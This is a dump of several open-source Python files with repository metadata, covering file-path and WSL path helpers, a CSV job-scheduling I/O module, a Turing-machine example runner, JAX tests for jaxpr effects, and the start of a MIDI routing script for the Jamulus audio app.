    Similarly, if you call the :func:`.imcp.imcp` or :func:`.imcp.immv`
    functions with the above parameters, both ``file.img`` and ``file.hdr``
    will be moved.
    .. note:: The primary use-case of file groups is to resolve ambiguity with
              respect to NIFTI and ANALYSE75 image pairs. By specifying
              ``fileGroups=[('.img', '.hdr'), ('.img.gz', '.hdr.gz')]``, the
              :func:`addExt`, :func:`.imcp.immv` and :func:`.imcp.imcp`
              functions are able to figure out what you mean when you specify
              ``file``, and both ``file.hdr`` and ``file.img`` (or
              ``file.hdr.gz`` and ``file.img.gz``) exist.
    :arg path: Path to the file. Must contain the file extension.
    :arg allowedExts: Allowed/recognised file extensions.
    :arg fileGroups: Recognised file groups.
    :arg fullPaths: If ``True`` (the default), full file paths (relative to
                    the ``path``) are returned. Otherwise, only the file
                    extensions in the group are returned.
    :arg unambiguous: Defaults to ``False``. If ``True``, and the path
                      is not unambiguously part of one group, or part of
                      no groups, a :exc:`PathError` is raised.
                      Otherwise, the path is returned.
    """
    # Resolve the path to an existing file (raises PathError otherwise).
    path = addExt(path, allowedExts, mustExist=True, fileGroups=fileGroups)
    base, ext = splitExt(path, allowedExts)
    if fileGroups is None:
        if fullPaths: return [path]
        else: return [ext]
    matchedGroups = []
    matchedGroupFiles = []
    fullMatches = 0
    partialMatches = 0
    # A group is a 'partial' match if any of its files exist on disk, and
    # a 'full' match if all of them do.
    for group in fileGroups:
        if ext != '' and ext not in group:
            continue
        groupFiles = [base + s for s in group]
        exist = [op.exists(f) for f in groupFiles]
        if any(exist):
            partialMatches += 1
        if all(exist):
            fullMatches += 1
            matchedGroups .append(group)
            matchedGroupFiles.append(groupFiles)
    # Path is not part of any group
    if partialMatches == 0:
        if fullPaths: return [path]
        else: return [ext]
    # If the given path is part of more
    # than one existing file group, we
    # can't resolve this ambiguity.
    if fullMatches > 1:
        raise PathError('Path is part of multiple '
                        'file groups: {}'.format(path))
    # If the unambiguous flag is not set,
    # we don't care about partial matches
    if not unambiguous:
        partialMatches = 0
    # The path is unambiguously part of a
    # complete file group - resolve it to
    # the first element of the group
    if fullMatches == 1 and partialMatches <= 1:
        if fullPaths: return matchedGroupFiles[0]
        else: return matchedGroups[ 0]
    # The path appears to be part of
    # an incomplete group - this is
    # potentially ambiguous, so give
    # up (but see the partialMatches
    # clobber above).
    elif partialMatches > 0:
        raise PathError('Path is part of an incomplete '
                        'file group: {}'.format(path))
    else:
        if fullPaths: return [path]
        else: return [ext]
def removeDuplicates(paths, allowedExts=None, fileGroups=None):
    """Filter ``paths`` down to a list containing at most one entry per
    file group.

    Each path is resolved to its file group (see :func:`getFileGroup`);
    the first time a group is seen, its first file is kept, and any later
    path belonging to an already-seen group is dropped. For example, with
    ``allowedExts=['.img', '.hdr']`` and ``fileGroups=[('.img', '.hdr')]``,
    the list ``['001.img', '001.hdr', '002.img', '002.hdr']`` reduces to
    ``['001.img', '002.img']``.

    Incomplete paths (i.e. without extensions) may be given when
    ``allowedExts`` is provided, as long as they are unambiguous. A
    :exc:`PathError` is raised if any path does not exist, or cannot be
    resolved unambiguously.

    :arg paths:       List of paths to reduce.
    :arg allowedExts: Allowed/recognised file extensions.
    :arg fileGroups:  Recognised file groups - see :func:`getFileGroup`.
    """
    kept = []
    for candidate in paths:
        group = getFileGroup(candidate, allowedExts, fileGroups)
        if all(member not in kept for member in group):
            kept.append(group[0])
    return kept
def uniquePrefix(path):
    """Return the shortest prefix of the given file's name which matches
    no other file in the same directory. The directory component of
    ``path`` is included in the returned prefix.

    Raises a :exc:`PathError` if a unique prefix could not be found
    (which will never happen if the path is valid).
    """
    dirname, filename = op.split(path)
    pos = 0
    prefix = op.join(dirname, filename[0])
    matches = glob.glob('{}*'.format(prefix))
    while len(matches) != 1:
        # No candidates left, or the whole file name has been consumed -
        # cannot happen for a path which actually exists.
        if len(matches) == 0 or pos >= len(filename) - 1:
            raise PathError('No unique prefix for {}'.format(filename))
        # Extend the prefix by one character and re-filter the candidates.
        pos += 1
        prefix = prefix + filename[pos]
        matches = [m for m in matches if m.startswith(prefix)]
    return prefix
def commonBase(paths):
    """Identifies the deepest common base directory shared by all files
    in ``paths``.

    Raises a :exc:`PathError` if the paths have no common base. This will
    never happen for absolute paths (as the base will be e.g. ``'/'``).
    """
    # Start from the deepest path, and walk up towards the root, stopping
    # at the first ancestor directory which contains every path.
    depths = [len(p.split(op.sep)) for p in paths]
    base = max(zip(depths, paths), key=operator.itemgetter(0))[1]
    last = base
    while True:
        base = op.split(base)[0]
        if base == last or len(base) == 0:
            break
        last = base
        # Compare on a directory boundary: a plain startswith() check
        # would wrongly accept '/a/bc' as being under the base '/a/b'.
        candidate = base if base.endswith(op.sep) else base + op.sep
        if all(p == base or p.startswith(candidate) for p in paths):
            return base
    raise PathError('No common base')
def wslpath(winpath):
    """
    Convert a Windows path (or a command line argument containing a Windows
    path) to the equivalent WSL path (e.g. ``c:\\Users`` -> ``/mnt/c/Users``).
    Also supports paths in the form ``\\wsl$\\(distro)\\users\\...``.

    :param winpath: Command line argument which may (or may not) contain a
                    Windows path. It is assumed to be either of the form
                    <windows path> or --<arg>=<windows path>. Note that we
                    don't need to handle --arg <windows path> or
                    -a <windows path> since in these cases the argument and
                    the path will be parsed as separate entities.
    :return:        If ``winpath`` matches a Windows path, the converted
                    argument (including the --<arg>= portion). Otherwise
                    returns ``winpath`` unchanged.
    """
    # \\wsl$\<distro>\... network paths map directly onto the distro root.
    match = re.match(r"^(--[\w-]+=)?\\\\wsl\$[\\\/][^\\^\/]+(.*)$", winpath)
    if match:
        arg, path = match.group(1, 2)
        if arg is None:
            arg = ""
        return arg + path.replace("\\", "/")
    # Drive-letter paths (c:\...) map onto /mnt/<drive>/...
    # The drive class is [a-zA-Z]: the previous [a-zA-z] range also
    # matched the punctuation characters between 'Z' and 'a' and '_'.
    match = re.match(r"^(--[\w-]+=)?([a-zA-Z]):(.+)$", winpath)
    if match:
        arg, drive, path = match.group(1, 2, 3)
        if arg is None:
            arg = ""
        return arg + "/mnt/" + drive.lower() + path.replace("\\", "/")
    return winpath
def winpath(wslpath):
    """
    Convert a WSL-local filepath (for example ``/usr/local/fsl/``) into a path that can be used from
    Windows.
    If ``self.fslwsl`` is ``False``, simply returns ``wslpath`` unmodified
    Otherwise, uses ``FSLDIR`` to deduce the WSL distro in use for FSL.
    This requires WSL2 which supports the ``\\wsl$\`` network path.
    wslpath is assumed to be an absolute path.
    """
    if not platform.fslwsl:
        # FSL is not installed inside WSL - nothing to translate.
        return wslpath
    else:
        # Extract the distro name from an FSLDIR of the form
        # \\wsl$\<distro>\... (set by the fsl.utils.platform module).
        match = re.match(r"^\\\\wsl\$\\([^\\]+).*$", platform.fsldir)
        if match:
            distro = match.group(1)
        else:
            distro = None
        if not distro:
            raise RuntimeError("Could not identify WSL installation from FSLDIR (%s)" % platform.fsldir)
        # Rebuild the path as a \\wsl$\<distro>\... network path.
        return "\\\\wsl$\\" + distro + wslpath.replace("/", "\\")
45a3d4d8a1f127580265a0a3c5979a90f99be58c | 2,219 | py | Python | implementation/data_io.py | rpalo/masters-thesis | fcc0beb933634b17dbe41bde982e947204fd498b | [
"MIT"
] | null | null | null | implementation/data_io.py | rpalo/masters-thesis | fcc0beb933634b17dbe41bde982e947204fd498b | [
"MIT"
] | null | null | null | implementation/data_io.py | rpalo/masters-thesis | fcc0beb933634b17dbe41bde982e947204fd498b | [
"MIT"
] | null | null | null | """Data I/O: Import and export data to other useable formats."""
import csv
from pathlib import Path
from model import Job
def import_csv(filename, base_dir=Path("data/")):
"""Converts CSV files with the relevant data (see columns below) to
a list of Jobs.
"""
datafile = base_dir / filename
with open(datafile, "r", newline="", encoding="utf-8-sig") as csvfile:
reader = csv.DictReader(csvfile)
return [
Job(
line["part number"],
int(line["quantity"]),
float(line["cycle"]),
int(line["cavities"]),
float(line["due date"]),
line["mold"],
line["material"],
[int(num) for num in line["machines"].split(",")],
float(line["setup"]),
float(line["teardown"])
) for i, line in enumerate(reader, start=2)
]
def export_csv(schedule, fitness, time_elapsed, filename, base_dir=Path("results/")):
"""Exports a generated schedule to CSV in a format where each machine
has its jobs listed with start and end dates in order of operation.
Each machine separated by a blank line.
"""
outfile = base_dir / filename
with open(outfile, "w") as csvfile:
fieldnames = ["part number", "due date", "material", "start", "end"]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for machine in schedule:
writer.writerow({"part number": f"Machine {machine.number}"})
for assignment in machine.queue:
writer.writerow({
"part number": assignment.job.number,
"due date": assignment.job.due_date,
"material": assignment.job.material,
"start": assignment.start,
"end": assignment.end,
})
writer.writerow({})
writer.writerow({})
writer.writerow({
"part number": "Total fitness:",
"due date": fitness
})
writer.writerow({
"part number": "Time elapsed:",
"due date": time_elapsed
}) | 36.377049 | 85 | 0.545291 | """Data I/O: Import and export data to other useable formats."""
import csv
from pathlib import Path
from model import Job
def import_csv(filename, base_dir=Path("data/")):
"""Converts CSV files with the relevant data (see columns below) to
a list of Jobs.
"""
datafile = base_dir / filename
with open(datafile, "r", newline="", encoding="utf-8-sig") as csvfile:
reader = csv.DictReader(csvfile)
return [
Job(
line["part number"],
int(line["quantity"]),
float(line["cycle"]),
int(line["cavities"]),
float(line["due date"]),
line["mold"],
line["material"],
[int(num) for num in line["machines"].split(",")],
float(line["setup"]),
float(line["teardown"])
) for i, line in enumerate(reader, start=2)
]
def export_csv(schedule, fitness, time_elapsed, filename, base_dir=Path("results/")):
"""Exports a generated schedule to CSV in a format where each machine
has its jobs listed with start and end dates in order of operation.
Each machine separated by a blank line.
"""
outfile = base_dir / filename
with open(outfile, "w") as csvfile:
fieldnames = ["part number", "due date", "material", "start", "end"]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for machine in schedule:
writer.writerow({"part number": f"Machine {machine.number}"})
for assignment in machine.queue:
writer.writerow({
"part number": assignment.job.number,
"due date": assignment.job.due_date,
"material": assignment.job.material,
"start": assignment.start,
"end": assignment.end,
})
writer.writerow({})
writer.writerow({})
writer.writerow({
"part number": "Total fitness:",
"due date": fitness
})
writer.writerow({
"part number": "Time elapsed:",
"due date": time_elapsed
}) | 0 | 0 | 0 |
4b6df05e93d40512d05614cf34c5a45fa482901a | 3,203 | py | Python | main.py | dilynfullerton/turing | f175b14b1fb1afe9f2bfeebd1cc069eef6658706 | [
"CC0-1.0"
] | 3 | 2016-07-20T08:46:55.000Z | 2018-05-14T11:27:41.000Z | main.py | dilynfullerton/turing | f175b14b1fb1afe9f2bfeebd1cc069eef6658706 | [
"CC0-1.0"
] | null | null | null | main.py | dilynfullerton/turing | f175b14b1fb1afe9f2bfeebd1cc069eef6658706 | [
"CC0-1.0"
] | null | null | null | from turing import turing_machine_from_file
from turing import tape_from_file
from turing import Tape
main()
| 31.401961 | 80 | 0.652825 | from turing import turing_machine_from_file
from turing import tape_from_file
from turing import Tape
def main():
    """Load the quicksort Turing machine and run it on its sample tape.

    Many more example machines live under examples/ (busy beavers, copy,
    subtract, counter, adder, Wolfram 2,3, infinite printer, negator,
    nand, collatz, factorial, primality) and can be exercised the same
    way: build a machine with turing_machine_from_file() and call
    compute() with an input tape file or a Tape instance.
    """
    machine = turing_machine_from_file('examples/quicksort.txt')
    machine.compute(
        input_tape='examples/quicksort_input.txt',
        print_results=True,
        max_iter=15000,
    )
main()
| 3,068 | 0 | 23 |
3494f87ceb9d94ec03be1cb6fd48f0923ce4c7df | 7,460 | py | Python | tests/jaxpr_effects_test.py | mbmccoy/jax | 74346f464bc8369d81964305fcf05f95f43fb2d3 | [
"Apache-2.0"
] | null | null | null | tests/jaxpr_effects_test.py | mbmccoy/jax | 74346f464bc8369d81964305fcf05f95f43fb2d3 | [
"Apache-2.0"
] | 3 | 2022-01-24T06:14:55.000Z | 2022-02-14T06:15:38.000Z | tests/jaxpr_effects_test.py | mbmccoy/jax | 74346f464bc8369d81964305fcf05f95f43fb2d3 | [
"Apache-2.0"
] | null | null | null | # Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from absl.testing import absltest
from absl.testing import parameterized
import jax
import jax.numpy as jnp
from jax import ad_checkpoint
from jax import core
from jax import lax
from jax import linear_util as lu
from jax.experimental import maps
from jax.experimental import pjit
from jax.config import config
from jax._src import test_util as jtu
import numpy as np
config.parse_flags_with_absl()
effect_p = core.Primitive('effect')
effect_p.multiple_results = True
@effect_p.def_effectful_abstract_eval
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
| 29.959839 | 78 | 0.684316 | # Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from absl.testing import absltest
from absl.testing import parameterized
import jax
import jax.numpy as jnp
from jax import ad_checkpoint
from jax import core
from jax import lax
from jax import linear_util as lu
from jax.experimental import maps
from jax.experimental import pjit
from jax.config import config
from jax._src import test_util as jtu
import numpy as np
config.parse_flags_with_absl()
# A test-only primitive whose sole purpose is to carry an arbitrary
# `effect` tag into any jaxpr that binds it.
effect_p = core.Primitive('effect')
effect_p.multiple_results = True
@effect_p.def_effectful_abstract_eval
def _(*, effect):
  # Abstract evaluation rule: no output avals, and a singleton effect set
  # containing the tag that was bound.
  return [], {effect}
class JaxprEffectsTest(jtu.JaxTestCase):
  """Tests that effects bound via `effect_p` are recorded on jaxpr
  equations and on the enclosing jaxpr, and that jaxpr type-checking
  validates the per-equation effect sets."""
  def test_trivial_jaxpr_has_no_effects(self):
    def f(x):
      return x + 1.
    jaxpr = jax.make_jaxpr(f)(2.)
    self.assertEqual(core.no_effects, jaxpr.effects)
  def test_effectful_primitive_in_jaxpr_creates_effects(self):
    def f(x):
      effect_p.bind(effect='foo')
      return x + 1.
    jaxpr = jax.make_jaxpr(f)(2.)
    # The effect appears both on the binding equation and on the jaxpr.
    self.assertEqual({'foo'}, jaxpr.jaxpr.eqns[0].effects)
    self.assertEqual({'foo'}, jaxpr.effects)
  def test_different_effects_in_jaxpr(self):
    def f(x):
      effect_p.bind(effect='foo')
      effect_p.bind(effect='bar')
      return x + 1.
    jaxpr = jax.make_jaxpr(f)(2.)
    self.assertEqual({'foo'}, jaxpr.jaxpr.eqns[0].effects)
    self.assertEqual({'bar'}, jaxpr.jaxpr.eqns[1].effects)
    # The jaxpr's effect set is the union of its equations' effects.
    self.assertEqual({'foo', 'bar'}, jaxpr.effects)
  def test_jaxpr_typecheck_should_verify_eqn_effects_are_subset(self):
    def f(x):
      effect_p.bind(effect='foo')
      effect_p.bind(effect='bar')
      return x + 1.
    jaxpr = jax.make_jaxpr(f)(2.).jaxpr
    # Edit jaxpr to make its type wrong
    jaxpr = jaxpr.replace(effects={'foo'})
    with self.assertRaisesRegex(core.JaxprTypeError,
        'Equation effects are not subset of Jaxpr effects.'):
      core.check_jaxpr(jaxpr)
class HigherOrderPrimitiveTest(jtu.JaxTestCase):
  """Checks that tracing effectful code through each higher-order
  primitive (core.call, jit, remat, custom_jvp/vjp, pmap, xmap, pjit)
  raises NotImplementedError instead of silently dropping the effects."""
  def test_core_call_primitive_inherits_effects(self):
    def f(x):
      @lu.wrap_init
      def f_(x):
        effect_p.bind(effect='foo')
        effect_p.bind(effect='bar')
        return [x]
      return core.call(f_, x)[0]
    with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
      jax.make_jaxpr(f)(2.)
  def test_xla_call_primitive_inherits_effects(self):
    @jax.jit
    def f(x):
      effect_p.bind(effect='foo')
      effect_p.bind(effect='bar')
      return x
    with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
      jax.make_jaxpr(f)(2.)
  @parameterized.named_parameters(jtu.cases_from_list(
      dict(testcase_name=f"_{flavor}", flavor=flavor)
      for flavor in ["old", "new"]))
  def test_remat_call_primitive_inherits_effects(self, flavor):
    # Exercise both the legacy jax.remat and the new checkpoint API.
    remat = jax.remat if flavor == "old" else ad_checkpoint.checkpoint
    @remat
    def f(x):
      effect_p.bind(effect='foo')
      effect_p.bind(effect='bar')
      return x
    with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
      jax.make_jaxpr(f)(2.)
  def test_custom_jvp_primitive_inherits_effects(self):
    @jax.custom_jvp
    def f(x):
      effect_p.bind(effect='foo')
      effect_p.bind(effect='bar')
      return x
    f.defjvp(lambda x, t: (x, t))
    with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
      jax.make_jaxpr(f)(2.)
  def test_custom_vjp_primitive_inherits_effects(self):
    @jax.custom_vjp
    def f(x):
      effect_p.bind(effect='foo')
      effect_p.bind(effect='bar')
      return x
    f.defvjp(
        fwd=lambda x: (x, ()),
        bwd=lambda _, g: g)
    with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
      jax.make_jaxpr(f)(2.)
  def test_pmap_inherits_effects(self):
    @jax.pmap
    def f(x):
      effect_p.bind(effect='foo')
      effect_p.bind(effect='bar')
      return x
    with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
      jax.make_jaxpr(f)(jnp.arange(jax.local_device_count()))
  def test_xmap_inherits_effects(self):
    def f(x):
      effect_p.bind(effect='foo')
      effect_p.bind(effect='bar')
      return x
    f = maps.xmap(f, in_axes=['a'], out_axes=['a'])
    with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
      jax.make_jaxpr(f)(jnp.arange(jax.local_device_count()))
  def test_pjit_inherits_effects(self):
    if jax.default_backend() not in {'gpu', 'tpu'}:
      raise unittest.SkipTest("pjit only supports GPU and TPU backends")
    def f(x):
      effect_p.bind(effect='foo')
      effect_p.bind(effect='bar')
      return x
    f = pjit.pjit(f, in_axis_resources=pjit.PartitionSpec('x'),
                  out_axis_resources=pjit.PartitionSpec('x'))
    with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
      with maps.Mesh(np.array(jax.devices()), ['x']):
        jax.make_jaxpr(f)(jnp.arange(jax.local_device_count()))
class EffectfulJaxprLoweringTest(jtu.JaxTestCase):
  """Lowering a jaxpr that carries effects is not implemented yet."""

  def test_cannot_lower_jaxpr_with_effects_in_hop(self):
    @jax.jit
    def f(x):
      effect_p.bind(effect='foo')
      return x + 1.
    # The error fires at execution time, when the jitted jaxpr is lowered.
    with self.assertRaisesRegex(NotImplementedError, 'Lowering jaxprs with '
                                'effects not supported'):
      f(2.)
class ControlFlowEffectsTest(jtu.JaxTestCase):
  """Effects are rejected in every branch/body of control-flow primitives."""

  def test_effects_disallowed_in_cond(self):
    # Effect in the true branch.
    def f1(x):
      def true_fun(x):
        effect_p.bind(effect='foo')
        return x
      def false_fun(x):
        return x
      return lax.cond(True, true_fun, false_fun, x)
    with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
      jax.make_jaxpr(f1)(2.)

    # Effect in the false branch.
    def f2(x):
      def true_fun(x):
        return x
      def false_fun(x):
        effect_p.bind(effect='foo')
        return x
      return lax.cond(True, true_fun, false_fun, x)
    with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
      jax.make_jaxpr(f2)(2.)

  def test_effects_disallowed_in_while(self):
    # Effect in the loop condition.
    def f1(x):
      def cond_fun(x):
        effect_p.bind(effect='foo')
        return False
      def body_fun(x):
        return x
      return lax.while_loop(cond_fun, body_fun, x)
    with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
      jax.make_jaxpr(f1)(2.)

    # Effect in the loop body.
    def f2(x):
      def cond_fun(x):
        return False
      def body_fun(x):
        effect_p.bind(effect='foo')
        return x
      return lax.while_loop(cond_fun, body_fun, x)
    with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
      jax.make_jaxpr(f2)(2.)

  def test_effects_disallowed_in_scan(self):
    def f(x):
      def body(carry, x):
        effect_p.bind(effect='foo')
        return carry, x
      return lax.scan(body, x, jnp.arange(4))
    with self.assertRaisesRegex(NotImplementedError, 'Effects not supported'):
      jax.make_jaxpr(f)(2.)
if __name__ == '__main__':
  # Run under JAX's test loader so jtu test configuration applies.
  absltest.main(testLoader=jtu.JaxTestLoader())
| 5,524 | 442 | 314 |
7c48d9a6536a3ab26943aaff46659b78907afae2 | 14,748 | py | Python | stage3/06-install-jamulus/files/midi-jamulus-xtouchmini-16ch.py | kdoren/pi-gen | f4421d81bf6b90232e5d39878e03016005324f92 | [
"BSD-3-Clause"
] | null | null | null | stage3/06-install-jamulus/files/midi-jamulus-xtouchmini-16ch.py | kdoren/pi-gen | f4421d81bf6b90232e5d39878e03016005324f92 | [
"BSD-3-Clause"
] | null | null | null | stage3/06-install-jamulus/files/midi-jamulus-xtouchmini-16ch.py | kdoren/pi-gen | f4421d81bf6b90232e5d39878e03016005324f92 | [
"BSD-3-Clause"
] | null | null | null | #!/usr/bin/python3
#
# Midi routing layer between jack and jamulus
# For Behringer X-Touch Mini MIDI controller
#
# Layer A: control 8 jamulus channels 0-7 (slider controls ALSA master level)
# Layer B: Control 8 jamulus channels 8-15 (slider controls ALSA capture level)
#
# Rotary encoder has 2 states (push to toggle between states)
# 1. fader (led ring display "fan" pattern, init full volume)
# 2. pan (led ring displays "pan" pattern, init center)
# Top button: "Mute"
# Bottom button: "Solo"
#
# X-Touch mini does not send layer change message.
# this script cannot detect a layer change until an event happens on new layer.
# So it is required to push a button or move an encoder after layer change,
# in order to refresh the encoder led ring state.
#
# Converts momentary pushbuttons and encoder push switches (which send midi note events)
# to toggle pushbuttons (by remembering state),
# and sends LED on/off messages back to midi controller to show state.
# Converts the note events from controller buttons into control events for jamulus.
#
# requires package python3-mididings from jambox-project repo,
# also requires package python-alsaaudio
# sudo apt install python3-mididings python3-alsaaudio
from mididings import *
from mididings.event import *
import alsaaudio
import time
import jack
import sys
import re
master = alsaaudio.Mixer('Master')
capture = alsaaudio.Mixer('Capture')
currentLayer = 0
jamulusChannel = 11
jamulusOutPort = 'out_2'
controllerChannel = 11
controllerGlobalChannel = 1
controllerOutPort = 'out_1'
ledRingSingle = 0
ledRingPan = 1
ledRingFan = 2
ledRingSpread = 3
ledRingTrim = 4
#
# configure mididings with 1 input & 2 output ports:
# - in from midi controller
# - out to midi controller, for setting LEDs etc.
# - out to Jamulus, with processed output (i.e. turn momentary switches into toggles)
#
# use buffered jack backend to minimize impact on audio
#
# automatically connect MIDI ports on startup.
# This script is lanuched in backgound before Jamulus is started
# Need to wait a few seconds before connecting to Jamulus
time.sleep(3)
# Jack has multiple mechanisms for sending alsa MIDI ports to Jack MIDI ports.
# All name the jack ports differently, and we want to work with them all.
# Mididings can use a regexp to look for a matching jack MIDI port
#
target_alias = '^.*X-TOUCH.MINI.*' # regexp allowed
client=jack.Client('mididings')
config(
backend='jack',
client_name='mididings',
in_ports = [
('in', target_alias ),
],
out_ports = [
(controllerOutPort, target_alias ),
(jamulusOutPort, 'Jamulus:input midi')
],
start_delay = 1
)
# there are 48 "buttons" on x-touch mini, on 2 layers (A & B)
# 8 x encoder push switches Layer A: 0-7 Layer B: 24-31
# 8 pushbuttons row 1 Layer A: 8-15 Layer B: 32-39
# 8 pushbuttons row 2 Layer A: 16-23 Layer B: 40-47
# x 2 layers
#
# save a toggle state for each one whether we intend to use it or not
# encoders: 0=fader (ledRing=fan) 1=pan (ledRing=pan)
# pushbuttons: 0=off (led off) 1=on (led on)
#
buttonState = [0] * 48
# Encoders will serve as both fader and pan,
# Encoder push switch will toggle state.
# LED setting of encoder will serve as visual feedback of current encoder state.
# For each encoder, save latest value so it can be restored on state change.
#
# There are 3 values for each encoder:
# encoderState (0=fader, 1=pan)
# faderValue
# panValue
encoderState = [0] * 19 # initialize to "fader" state
faderValue = [127] * 19 # initialize to full volume
panValue = [64] * 19 # initialize to pan center
#
# noteTable is a list of tuples, indexed by the note number 0-47
# the tuples contain:
# ( note, layer, jamulusControlNumber, encoderControlNumber )
#
# note: note number that will toggle state
# layer: 0=Layer A, 1=Layer B
# jamulusControlNumber: Control number to send to Jamulus (for mute & solo buttons)
# encoderControlNumber: Control number in xtouch-mini to send restored encoder value
#
noteTable = [
(0, 0, None, 1), # Layer A encoder push switches
(1, 0, None, 2),
(2, 0, None, 3),
(3, 0, None, 4),
(4, 0, None, 5),
(5, 0, None, 6),
(6, 0, None, 7),
(7, 0, None, 8),
(8, 0, 19, None), # Layer A pushbuttons row 1 (mute 1-8)
(9, 0, 20, None),
(10, 0, 21, None),
(11, 0, 22, None),
(12, 0, 23, None),
(13, 0, 24, None),
(14, 0, 25, None),
(15, 0, 26, None),
(16, 0, 35, None), # Layer A pushbuttons row 2 (solo 1-8)
(17, 0, 36, None),
(18, 0, 37, None),
(19, 0, 38, None),
(20, 0, 39, None),
(21, 0, 40, None),
(22, 0, 41, None),
(23, 0, 42, None),
(24, 1, None, 11), # Layer B encoder push switches
(25, 1, None, 12),
(26, 1, None, 13),
(27, 1, None, 14),
(28, 1, None, 15),
(29, 1, None, 16),
(30, 1, None, 17),
(31, 1, None, 18),
(32, 1, 27, None), # Layer B pushbuttons row 1 (mute 9-16)
(33, 1, 28, None),
(34, 1, 29, None),
(35, 1, 30, None),
(36, 1, 31, None),
(37, 1, 32, None),
(38, 1, 33, None),
(39, 1, 34, None),
(40, 1, 43, None), # Layer B pushbuttons row 2 (solo 9-16)
(41, 1, 44, None),
(42, 1, 45, None),
(43, 1, 46, None),
(44, 1, 47, None),
(45, 1, 48, None),
(46, 1, 49, None),
(47, 1, 50, None)
]
# There are 18 controls on x-touch mini
# 8 encoders Layer A: 1-8 Layer B: 11-18
# 1 slider Layer A: 9 Layer B: 10
# x 2 layers
#
# controlTable is a list of tuples, indexed by the control number 0-18
# the tuples contain:
# (encoderControlNumber, layer, ledRing, controlOutFader, controlOutPan )
#
# encoderControlNumber: Control number in xtouch-mini to receive, also to send restored encoder value
# layer: 0=Layer A, 1=Layer B
# ledRing: Control number to send to xtouch-mini to set led Ring behavior (fan for fader, pan for pan)
# controlOutFader: Control number to send to Jamulus for fader when in fader state
# controlOutPan: Control number to send to Jamulus for pan when in pan state
#
controlTable = [
(0, None, None, None, None), # contol number 0 not used
(1, 0, 1, 1, 51), # layer A encoders 1-8
(2, 0, 2, 2, 52),
(3, 0, 3, 3, 53),
(4, 0, 4, 4, 54),
(5, 0, 5, 5, 55),
(6, 0, 6, 6, 56),
(7, 0, 7, 7, 57),
(8, 0, 8, 8, 58),
(9, 0, None, None, None), # Layer A slider
(10, 1, None, None, None), # Layer B slider
(11, 1, 1, 9, 59), # layer B encoders 9-16
(12, 1, 2, 10, 60),
(13, 1, 3, 11, 61),
(14, 1, 4, 12, 62),
(15, 1, 5, 13, 63),
(16, 1, 6, 14, 64),
(17, 1, 7, 15, 65),
(18, 1, 8, 16, 66)
]
#
# Convert the momentary on/off buttons to toggle events when the button press occurs
# Need to use NOTEOFF events, because X-touch mini
# does not allow setting LED while button is down
#
# Process control value changes.
# Update the stored value, and send to jamulus channel based on the encoder state (fader or pan).
# Sliders are used as alsa controls for Master & Capture, not sent to Jamulus
# X-Touch Mini sends events on midi channel 11.
# use jamulus --ctrlmidich string: "11;f1*16;m19*16;s35*16;p51*16"
# send channel 11 controls 1-18 to Jamulus on port 2 to use for faders (layer A, controls 1-8) and pan (layer b, controls 11-18)
#
# send controls 9 & 10 to alsa for Master and Capture levels
#
# for NOTEOFF events from pushbutton, toggle the button state
# and send back to x-touch mini on port1 to set LED state (convert to a NOTEON event to turn on LED)
# Also send to Jamulus on port 2 as a control event to set mute and solo buttons.
# Use controls above 18 to avoid conflict with physical controls
#
xtouchmini_patch16 = [
ChannelFilter(11) >> [
# Process control changes
CtrlFilter(1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18) % Process(controlChange),
# Process button presses on NOTEOFF event
(KeyFilter(0,48) & Filter(NOTEOFF)) % Process(noteOff)
]
]
jamulus_midi = SceneGroup('jamulus_midi', [
Scene('xtouchmini', xtouchmini_patch16, [
[
# Scene initialization events go here
# set to standard mode (not Mackie Control)
Ctrl(controllerOutPort, controllerGlobalChannel, 127, 0),
# set to Layer A
Program(controllerOutPort, controllerGlobalChannel, 1),
# initialize controller encoder values and LED ring states
Process(controllerInit,0)
]
])
])
run(
# control=control,
# pre=preScene,
scenes={
1: jamulus_midi
}
)
| 38.108527 | 128 | 0.62978 | #!/usr/bin/python3
#
# Midi routing layer between jack and jamulus
# For Behringer X-Touch Mini MIDI controller
#
# Layer A: control 8 jamulus channels 0-7 (slider controls ALSA master level)
# Layer B: Control 8 jamulus channels 8-15 (slider controls ALSA capture level)
#
# Rotary encoder has 2 states (push to toggle between states)
# 1. fader (led ring display "fan" pattern, init full volume)
# 2. pan (led ring displays "pan" pattern, init center)
# Top button: "Mute"
# Bottom button: "Solo"
#
# X-Touch mini does not send layer change message.
# this script cannot detect a layer change until an event happens on new layer.
# So it is required to push a button or move an encoder after layer change,
# in order to refresh the encoder led ring state.
#
# Converts momentary pushbuttons and encoder push switches (which send midi note events)
# to toggle pushbuttons (by remembering state),
# and sends LED on/off messages back to midi controller to show state.
# Converts the note events from controller buttons into control events for jamulus.
#
# requires package python3-mididings from jambox-project repo,
# also requires package python-alsaaudio
# sudo apt install python3-mididings python3-alsaaudio
from mididings import *
from mididings.event import *
